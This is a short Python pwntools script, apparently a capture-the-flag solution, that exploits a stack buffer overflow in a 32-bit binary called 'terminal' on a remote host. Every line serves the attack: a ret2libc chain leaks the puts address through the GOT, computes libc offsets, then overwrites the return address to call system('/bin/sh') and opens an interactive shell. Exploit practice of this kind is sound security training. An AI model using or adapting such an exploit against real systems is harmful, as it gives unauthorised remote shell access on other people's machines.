#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./terminal", checksec=False)
# r = process()
r = remote("20.199.76.210", 1005)

# func
s = lambda a: r.sendlineafter(b"# ", a)

# leak
buf = b"A"*62
buf += p32(target.sym.puts)
buf += p32(0x804974d)
buf += p32(target.got.puts)
s(buf)
puts = u32(r.recv(4))
log.info("puts: 0x%lx", puts)
libc_base = puts - 0x76aa0
log.info("libc: 0x%lx", libc_base)
system = libc_base + 0x4f8f0
log.info("system: 0x%lx", system)
sh = libc_base + 0x1bcde8

# shell
buf = b"A"*62
buf += p32(system)
buf += b"BLUH"
buf += p32(sh)
s(buf)

r.interactive()